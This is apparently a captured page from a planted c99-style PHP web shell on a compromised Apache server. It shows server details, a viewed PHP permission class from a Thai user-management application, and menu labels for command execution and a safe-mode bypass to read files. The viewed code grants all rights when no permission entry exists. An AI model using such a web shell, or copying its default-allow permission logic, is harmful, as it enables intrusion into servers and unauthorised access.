Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk/ums/ drwxr-xr-x |
Viewing file: Select action/file-type: c = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']); $this->aGp=array('00'=>array(0,0,0,0,0)); $this->aUp=array('00'=>array(0,0,0,0,0)); } function getLoginName(){ return $this->userLogin; } function getUserIP(){ return $this->userIP; } function getName(){ return $this->userName; } function getDptCode(){ return $this->userDptCode; } function getDptName(){ return $this->userDptName; } function checkAA(){ return true; } function isExpire(){ return false; } function isActive(){ return $this->active; } function getKeyUP(){ return $this->userID.$this->MnID; } function getKeyGP(){ return $this->GpID.$this->MnID; } function GetRightsByMenu(){ global $oU; if (array_key_exists($this->getKeyUP(), $this->aUp)){ //echo "found in user permission."; $this->X=$this->aUp[$this->getKeyUP()][0]; $this->C=$this->aUp[$this->getKeyUP()][1]; $this->R=$this->aUp[$this->getKeyUP()][2]; $this->U=$this->aUp[$this->getKeyUP()][3]; $this->D=$this->aUp[$this->getKeyUP()][4]; }elseif (array_key_exists($this->getKeyGP(),$this->aGp)){ //echo "found in group permission."; $this->X=$this->aGp[$this->getKeyGP()][0]; $this->C=$this->aGp[$this->getKeyGP()][1]; $this->R=$this->aGp[$this->getKeyGP()][2]; $this->U=$this->aGp[$this->getKeyGP()][3]; $this->D=$this->aGp[$this->getKeyGP()][4]; }else{ //echo "get all permissions."; $this->X=1; $this->C=1; $this->R=1; $this->U=1; $this->D=1; } //ขาดส่วนบันทึกลง log } function CRUD($link, $linktype){ $linktype=strtolower($linktype); if (strpos("crud",$linktype)===false) die("ชนิดของ Link ต้องเป็น CRUD เท่านั้น"); $flg = false; if ($linktype=="c" and $this->C==0) $flg=true; elseif ($linktype=="r" and $this->R==0) $flg=true; elseif ($linktype=="u" and $this->U==0) $flg=true; elseif ($linktype=="d" and $this->D==0) $flg=true; if ($flg==false){ return $link; }else{ $link=trim($link); $s = strtolower($link); //---------------------------------------------------------------- //find image name // $input="images/del.gif"; // $output = "images/delgrey.gif"; // use explode fn // $this->createGreyFromGifJpg($input, $output); //--------------------------------------------------------------- //rename imagename.gif to imagenamegrey.gif $pGif = strpos($s,".gif"); if ($pGif===false){ }else{ $ss = substr_replace($link, "grey", $pGif).substr($link, $pGif); $link = $ss; $s = strtolower($link); } //rename imagename.jpg to imagenamegrey.jpg $pJpg = strpos($s,".jp"); if ($pJpg===false){ }else{ $ss = substr_replace($link, "grey", $pJpg).substr($link, $pJpg); $link = $ss; $s = strtolower($link); } //add disabled to input tag $pos = strpos($s,"input"); if ($pos===false){ }else{ $ss = substr_replace($link, "input disabled", $pos).substr($link, $pos+5); $link = $ss; $s = strtolower($link); } //change onclick-->onklick $pOnClick = strpos($s,"onclick"); if ($pOnClick===false){ }else{ $ss = substr_replace($link, "onklick", $pOnClick).substr($link, $pOnClick+7); $link = $ss; $s = strtolower($link); } //////////// //disable tag A $pHref = strpos($s,"href"); if ($pHref===false){ }else{ $ss = substr_replace($link, "href1", $pHref).substr($link, $pHref+4); $link = $ss; $s = strtolower($link); } //disable text between tag A and not have tag img $pImg = strpos($s," |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]-- |